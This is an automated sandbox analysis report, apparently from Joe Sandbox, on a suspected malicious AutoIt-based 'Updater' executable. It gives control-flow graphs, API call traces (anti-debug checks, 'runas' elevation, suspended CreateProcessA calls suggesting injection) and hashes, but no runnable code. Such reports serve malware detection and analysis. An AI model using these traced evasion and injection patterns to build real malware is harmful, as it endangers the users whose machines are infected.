                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                  • API String ID: 1759228003-2375825460
                                                                                                  • Opcode ID: 5d406fc577966639fe776d678845add278b65b7ea4764b24b7dd735e40b36c7a
                                                                                                  • Instruction ID: a508c1c7bd197ab18d1036af1d2d1b16f12761f25b65261889a0bbeaf68edb63
                                                                                                  • Opcode Fuzzy Hash: 5d406fc577966639fe776d678845add278b65b7ea4764b24b7dd735e40b36c7a
                                                                                                  • Instruction Fuzzy Hash: 8B619875F4424E7EEF11DAE9CC45FEFBBBC9B28700F414096A605E2191D7B4DA448B50

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 500 6e310d-6e317c call 6df38f GetVersionExW call 6df82c 505 727ad9-727aec 500->505 506 6e3182 500->506 508 727aed-727af1 505->508 507 6e3184-6e3186 506->507 509 6e318c-6e31e6 call 6df9a0 call 6df433 507->509 510 727b18 507->510 511 727af3 508->511 512 727af4-727b00 508->512 525 6e31ec-6e31ee 509->525 526 727c2f-727c36 509->526 515 727b1f-727b2b 510->515 511->512 512->508 514 727b02-727b04 512->514 514->507 517 727b0a-727b11 514->517 518 6e324c-6e3266 GetCurrentProcess IsWow64Process 515->518 517->505 520 727b13 517->520 522 6e3268 518->522 523 6e32c7-6e32cd 518->523 520->510 524 6e326e-6e327a 522->524 523->524 527 727c74-727c78 GetSystemInfo 524->527 528 6e3280-6e328f LoadLibraryA 524->528 531 727b30-727b43 525->531 532 6e31f4-6e31f7 525->532 529 727c56-727c59 526->529 530 727c38 526->530 533 6e32cf-6e32d9 GetSystemInfo 528->533 534 6e3291-6e329f GetProcAddress 528->534 538 727c44-727c4c 529->538 539 727c5b-727c6a 529->539 537 727c3e 530->537 535 727b45-727b4e 531->535 536 727b6c-727b6e 531->536 532->518 540 6e31f9-6e3235 532->540 544 6e32a7-6e32a9 533->544 534->533 541 6e32a1-6e32a5 GetNativeSystemInfo 534->541 542 727b50-727b56 535->542 543 727b5b-727b67 535->543 545 727ba3-727ba6 536->545 546 727b70-727b85 536->546 537->538 538->529 539->537 547 727c6c-727c72 539->547 540->518 548 6e3237-6e3240 540->548 541->544 542->518 543->518 549 6e32ab-6e32ac FreeLibrary 544->549 550 6e32b2-6e32c6 544->550 553 727be1-727be4 545->553 554 727ba8-727bc3 545->554 551 727b92-727b9e 546->551 552 727b87-727b8d 546->552 547->538 548->515 555 6e3246 548->555 549->550 551->518 552->518 553->518 556 727bea-727c11 553->556 557 727bd0-727bdc 554->557 558 727bc5-727bcb 554->558 555->518 559 727c13-727c19 556->559 560 727c1e-727c2a 556->560 557->518 558->518 559->518 560->518
                                                                                                  APIs
                                                                                                  • GetVersionExW.KERNEL32(?), ref: 006E313C
                                                                                                    • Part of subcall function 006DF82C: _wcslen.LIBCMT ref: 006DF83F
                                                                                                  • GetCurrentProcess.KERNEL32(?,0076D9B8,00000000,?,?), ref: 006E3253
                                                                                                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 006E325A
                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006E3285
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006E3297
                                                                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 006E32A5
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 006E32AC
                                                                                                  • GetSystemInfo.KERNEL32(?,?,?), ref: 006E32D3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                  • String ID: GetNativeSystemInfo$`#z$kernel32.dll$l#z$l#z
                                                                                                  • API String ID: 3290436268-2282951049
                                                                                                  • Opcode ID: 6d15e6530055b372df7109cf3ae2290a3ea9bc9db0cc3ca338b06896a42a83ef
                                                                                                  • Instruction ID: 6f297212757f8dc88435de64f1faf8ca24ca6cbec0522b96c3f0f17a47feeaac
                                                                                                  • Opcode Fuzzy Hash: 6d15e6530055b372df7109cf3ae2290a3ea9bc9db0cc3ca338b06896a42a83ef
                                                                                                  • Instruction Fuzzy Hash: C691C23290A3E5DFCF15C73D78450A93F666BA7301B14C899E5819B323DA2C4A07DB2E

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006E2D63
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 006E2D76
                                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 006E2DE2
                                                                                                    • Part of subcall function 006DF82C: _wcslen.LIBCMT ref: 006DF83F
                                                                                                    • Part of subcall function 006DA65C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006DA69D
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 006E2E63
                                                                                                  • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00727988
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 007279C9
                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00791E24), ref: 00727A52
                                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 00727A59
                                                                                                    • Part of subcall function 006E2C51: GetSysColorBrush.USER32(0000000F), ref: 006E2C5C
                                                                                                    • Part of subcall function 006E2C51: LoadCursorW.USER32(00000000,00007F00), ref: 006E2C6B
                                                                                                    • Part of subcall function 006E2C51: LoadIconW.USER32(00000063), ref: 006E2C81
                                                                                                    • Part of subcall function 006E2C51: LoadIconW.USER32(000000A4), ref: 006E2C93
                                                                                                    • Part of subcall function 006E2C51: LoadIconW.USER32(000000A2), ref: 006E2CA5
                                                                                                    • Part of subcall function 006E2C51: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006E2CBD
                                                                                                    • Part of subcall function 006E2C51: RegisterClassExW.USER32(?), ref: 006E2D0E
                                                                                                    • Part of subcall function 006EFBB7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006EFBE5
                                                                                                    • Part of subcall function 006EFBB7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006EFC06
                                                                                                    • Part of subcall function 006EFBB7: ShowWindow.USER32(00000000), ref: 006EFC1A
                                                                                                    • Part of subcall function 006EFBB7: ShowWindow.USER32(00000000), ref: 006EFC23
                                                                                                    • Part of subcall function 006E34C7: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006E3598
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                  • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$p)z$p3z$runas
                                                                                                  • API String ID: 683915450-1358270189
                                                                                                  • Opcode ID: ddcd8b8ed02404e3d73a7fbfcea439b3401bba162c6ccdef4bc1729509ec446d
                                                                                                  • Instruction ID: 3a77fc558149eeb2bc6ba94d651848e8ecc94d7d2f2f8fa585360dc49c061978
                                                                                                  • Opcode Fuzzy Hash: ddcd8b8ed02404e3d73a7fbfcea439b3401bba162c6ccdef4bc1729509ec446d
                                                                                                  • Instruction Fuzzy Hash: CF516D7050C381AACF11EF65DC51DAE7BABABC3700F00453DF582462A3CA6C994BD76A

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 855 14a1adf 856 14a1ae0-14a1b11 lstrcpyn GetThreadLocale GetLocaleInfoA 855->856 857 14a1c10-14a1c16 856->857 858 14a1b17-14a1b1b 856->858 859 14a1b1d-14a1b21 858->859 860 14a1b27-14a1b3e lstrlen 858->860 859->857 859->860 861 14a1b43-14a1b49 860->861 862 14a1b4b-14a1b54 861->862 863 14a1b56-14a1b5f 861->863 862->863 864 14a1b40 862->864 863->857 865 14a1b65-14a1b6c 863->865 864->861 866 14a1b9a-14a1b9c 865->866 867 14a1b6e-14a1b98 lstrcpyn LoadLibraryExA 865->867 866->857 868 14a1b9e-14a1ba2 866->868 867->866 868->857 869 14a1ba4-14a1bd8 lstrcpyn LoadLibraryExA 868->869 869->857 870 14a1bda-14a1c0e lstrcpyn LoadLibraryExA 869->870 870->857
                                                                                                  APIs
                                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 014A1AF0
                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 014A1AFD
                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 014A1B03
                                                                                                  • lstrlen.KERNEL32(00000000), ref: 014A1B2E
                                                                                                  • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 014A1B83
                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1B93
                                                                                                  • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 014A1BBF
                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1BCF
                                                                                                  • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1BF9
                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1C09
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1599918012-0
                                                                                                  • Opcode ID: b30b88bd219cbaf4d9da21ce8602e9a1d9637ed92d71513b3b0053543624a1ba
                                                                                                  • Instruction ID: 35f8c17ed186be19ec8640d5ccdffb67fea846f404046e79cd6861b37c7b3f22
                                                                                                  • Opcode Fuzzy Hash: b30b88bd219cbaf4d9da21ce8602e9a1d9637ed92d71513b3b0053543624a1ba
                                                                                                  • Instruction Fuzzy Hash: 19316475E4424A7EEF11DAF9CC84FEFBBBC9B68700F4044A69244E3151E7B49A448B50
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E4E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 006E4E6B
                                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 006E4273
                                                                                                  • GetSysColor.USER32(0000000F), ref: 006E42C5
                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 006E42D8
                                                                                                    • Part of subcall function 006E3AE2: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 006E3B2A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ColorProc$LongWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 3744519093-0
                                                                                                  • Opcode ID: bfd52696b8c98dc9d0575a2c1021915675a42d1ae130225a11c8bf6ae15b771a
                                                                                                  • Instruction ID: 3e1716946ad248c6852005dfa23c9b20dc675124587f7e6b1417f6b64eff48b9
                                                                                                  • Opcode Fuzzy Hash: bfd52696b8c98dc9d0575a2c1021915675a42d1ae130225a11c8bf6ae15b771a
                                                                                                  • Instruction Fuzzy Hash: ACA1FC70107390BFE764AE7FAC4CDBF265EDB86300F154109F602D6696DE2E9E428276
                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 014A3EE8
                                                                                                  • FindClose.KERNEL32(00000000,00000000,?), ref: 014A3EF3
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 014A3F0C
                                                                                                  • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 014A3F1D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                  • String ID:
                                                                                                  • API String ID: 2659516521-0
                                                                                                  • Opcode ID: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
                                                                                                  • Instruction ID: 5f9449cd95a26a0420f79bfb7ee580efcaec8a1d697030fdea210e82489ef796
                                                                                                  • Opcode Fuzzy Hash: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
                                                                                                  • Instruction Fuzzy Hash: 4BF01871D0120DA6CB51EAF98C84ECFB3BC5B38314F910797B558D71A1E674D7045B50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: P3z$Variable is not of type 'Object'.
                                                                                                  • API String ID: 0-4245219305
                                                                                                  • Opcode ID: d21331f75ebe6edfd5c401910679ef4d2d9e6586939b5958cc5e3895103453d3
                                                                                                  • Instruction ID: e1cd7e586cdcbc955344d072114997e3f4b97fc5b89aa9facb82ef2425a8b9e4
                                                                                                  • Opcode Fuzzy Hash: d21331f75ebe6edfd5c401910679ef4d2d9e6586939b5958cc5e3895103453d3
                                                                                                  • Instruction Fuzzy Hash: 1A329D70D08218DBCF14DF94C890AEDB7B6FF55304F14805AE806AB392E779AE46DB52
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
                                                                                                  • Instruction ID: be68be7296445d1d8c9efe5ed17a0ddc0ed5e3a0c0ce8a40cfea562a1559ef80
                                                                                                  • Opcode Fuzzy Hash: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
                                                                                                  • Instruction Fuzzy Hash: 24A00231445A80DBDE11DB10CB49B09B761FBC0F01F108E64A0464781457785800D941

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 6e51fb-6e522a call 6f042b call 6e5d68 5 728d54-728d58 0->5 6 6e5230-6e5243 call 6e2960 0->6 7 6e5245-6e5262 5->7 8 728d5e 5->8 6->7 11 6e5269-6e5276 7->11 12 6e5264 7->12 13 728d64-728d6a 8->13 14 6e527c-6e5282 11->14 15 728d7a-728d7c 11->15 12->11 13->7 16 728d70-728d73 13->16 17 728d87 14->17 18 6e5288-6e5298 14->18 15->17 16->13 19 728d75 16->19 20 728d92-728d97 17->20 18->20 21 6e529e-6e52b3 18->21 19->7 22 728dc9-728de1 call 6e4e5a 20->22 23 728d99-728d9b 20->23 24 6e52b9-6e52bd 21->24 25 728e5a 21->25 40 728de3-728dee 22->40 41 728df5-728e45 GetWindowRect GetClientRect GetSystemMetrics * 2 22->41 26 728da0 23->26 27 728e62 24->27 28 6e52c3-6e52c6 24->28 25->27 30 728da2-728dac call 6e5c2e 26->30 31 728dae-728db9 26->31 37 728e6a-728e6e 27->37 32 6e52c8-6e52f2 SystemParametersInfoW GetSystemMetrics 28->32 33 6e52f5-6e52f9 28->33 36 728dc2 30->36 31->36 32->33 38 6e52fb-6e532e SystemParametersInfoW GetSystemMetrics 33->38 39 6e5341-6e539c SetRect AdjustWindowRectEx CreateWindowExW 33->39 36->22 45 728e74-728e78 37->45 46 728dbb-728dbd call 768251 37->46 38->39 47 6e5330-6e533e GetSystemMetrics 38->47 48 6e53a2-6e5405 SetWindowLongW GetClientRect GetStockObject SendMessageW call 6e4b74 39->48 49 728d9d 39->49 40->41 42 728e52 41->42 43 728e47-728e4f GetSystemMetrics 41->43 42->25 43->42 45->46 51 728e7e-728e82 call 6e544c 45->51 46->36 47->39 55 6e541d-6e543b call 6e5915 48->55 56 6e5407-6e5418 SetTimer 48->56 49->26 57 728e87 51->57 55->37 60 6e5441-6e5449 55->60 56->55 57->57
                                                                                                  APIs
                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006E52D2
                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 006E52DA
                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006E5305
                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 006E530D
                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 006E5332
                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006E534F
                                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006E535F
                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006E5392
                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006E53A6
                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 006E53C4
                                                                                                  • GetStockObject.GDI32(00000011), ref: 006E53E0
                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 006E53EB
                                                                                                    • Part of subcall function 006E4B74: GetCursorPos.USER32(?), ref: 006E4B88
                                                                                                    • Part of subcall function 006E4B74: ScreenToClient.USER32(00000000,?), ref: 006E4BA5
                                                                                                    • Part of subcall function 006E4B74: GetAsyncKeyState.USER32(00000001), ref: 006E4BCE
                                                                                                    • Part of subcall function 006E4B74: GetAsyncKeyState.USER32(00000002), ref: 006E4BE8
                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,006E3AA8), ref: 006E5412
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                  • String ID: AutoIt v3 GUI$(z$(z
                                                                                                  • API String ID: 1458621304-3809366781
                                                                                                  • Opcode ID: ff7915132a5854d47aaed0cab7d520f0c699ead71ed1bef4eae2921425812d49
                                                                                                  • Instruction ID: 84e6ee769ff66da7ba1dcc06ca5410ce831f7c5054c6312b37ab8b4beddb3c1f
                                                                                                  • Opcode Fuzzy Hash: ff7915132a5854d47aaed0cab7d520f0c699ead71ed1bef4eae2921425812d49
                                                                                                  • Instruction Fuzzy Hash: D2B17A31A01309DFDB14DFA9DC49BAD3BB5FB48314F108229FA06AB291DB78A841CB55
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$DispatchSleepTimeTranslatetime
                                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$P3z$P3z$P3z
                                                                                                  • API String ID: 1406140084-917982011
                                                                                                  • Opcode ID: 4140d7d23ef8017b551aa6841180c983faaed0c6342cf5f7b664482266d34ebe
                                                                                                  • Instruction ID: 6f80dad47c0f09699c20e183f3b053b38a832bc53b72f5f921c6d67175524091
                                                                                                  • Opcode Fuzzy Hash: 4140d7d23ef8017b551aa6841180c983faaed0c6342cf5f7b664482266d34ebe
                                                                                                  • Instruction Fuzzy Hash: E152F370A08341DFD724CF28C855BEAB7E2BF81304F14851EE59A8B391D778A985CB97

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 369 14b7451-14b74a0 call 14a0919 * 2 374 14b74a2 call 14b2ccd 369->374 375 14b74a7-14b74ae 369->375 374->375 377 14b7a3d-14b7a6f call 14a04b1 call 14a048d call 14a04b1 375->377 378 14b74b4-14b74c2 375->378 378->377 379 14b74c8-14b74dd 378->379 379->377 381 14b74e3-14b7511 call 14b6921 * 2 379->381 391 14b751b 381->391 392 14b7513-14b7519 381->392 393 14b7521-14b752c 391->393 392->393 394 14b752e-14b755d call 14a0929 * 2 CreateProcessA 393->394 395 14b758c-14b75b4 call 14a0929 CreateProcessA 393->395 401 14b760c-14b761b call 14b72a9 394->401 407 14b7563-14b7581 CreateProcessA 394->407 395->401 402 14b75b6-14b75d4 CreateProcessA 395->402 409 14b7a02-14b7a04 401->409 410 14b7621-14b7664 call 14b3125 call 14b7039 401->410 402->401 405 14b75d6-14b7606 call 14a4121 call 14a0929 CreateProcessA 402->405 405->377 405->401 407->377 411 14b7587 407->411 414 14b7a38 GetTickCount 409->414 415 14b7a06-14b7a33 call 14b3125 409->415 422 14b766a-14b7681 410->422 423 14b7912-14b7947 call 14b3125 410->423 411->401 414->377 415->414 425 14b76fe-14b7717 call 14b70d5 422->425 426 14b7683-14b76bb call 14b3125 422->426 431 14b7949-14b795e call 14b7451 423->431 432 14b7963-14b7966 423->432 430 14b771c 425->430 438 14b76bd-14b76de call 14b70d5 426->438 439 14b76e0-14b76fc call 14b70d5 426->439 434 14b771f-14b7723 430->434 431->377 436 14b7968-14b797d call 14b7451 432->436 437 14b7982-14b79a3 call 14a0775 call 14b5ee9 432->437 440 14b7745-14b7749 434->440 441 14b7725-14b7729 434->441 436->377 437->377 438->434 439->434 451 14b774c-14b774e 440->451 449 14b772b-14b773b call 14b709d 441->449 450 14b773d-14b773f 441->450 449->450 463 14b7741-14b7743 449->463 450->451 456 14b787b-14b78b1 call 14b3125 451->456 457 14b7754-14b7793 call 14b73ad call 14b716d 451->457 466 14b78cd-14b78d0 456->466 467 14b78b3-14b78c1 call 14b7451 456->467 473 14b7799-14b77a4 457->473 474 14b7862-14b7866 457->474 463->451 470 14b78ec-14b790d call 14a0775 call 14b5ee9 466->470 471 14b78d2-14b78e7 call 14b7451 466->471 475 14b78c6-14b78c8 467->475 470->377 471->377 480 14b77a6-14b77d0 call 14b72e9 call 14b6915 473->480 481 14b77d5-14b780f call 14b3125 call 14b7039 473->481 478 14b79a8-14b79fd call 14b3125 474->478 479 14b786c-14b7876 call 14a1ed5 474->479 475->377 478->409 479->478 480->481 481->474 495 14b7811-14b785a call 14b716d call 14b3125 481->495 499 14b785f 495->499 499->474
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,014B7A70), ref: 014B7556
                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,014B7A70,00000000,00000000,00000000,00000000,00000000,00000004), ref: 014B757A
                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,014B7A70), ref: 014B75AD
                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,014B7A70,00000000,00000000,00000000,00000000,00000000,00000004), ref: 014B75CD
                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,014B7A70,00000000,00000000,00000000,00000000,00000000,00000004), ref: 014B75FF
                                                                                                    • Part of subcall function 014B3125: GetTickCount.KERNEL32 ref: 014B319E
                                                                                                    • Part of subcall function 014B5EE9: MessageBoxA.USER32(00000000,00000000,014B5F49,00040040), ref: 014B5F1C
                                                                                                  • GetTickCount.KERNEL32 ref: 014B7A38
                                                                                                  Strings
                                                                                                  Memory Dump Source
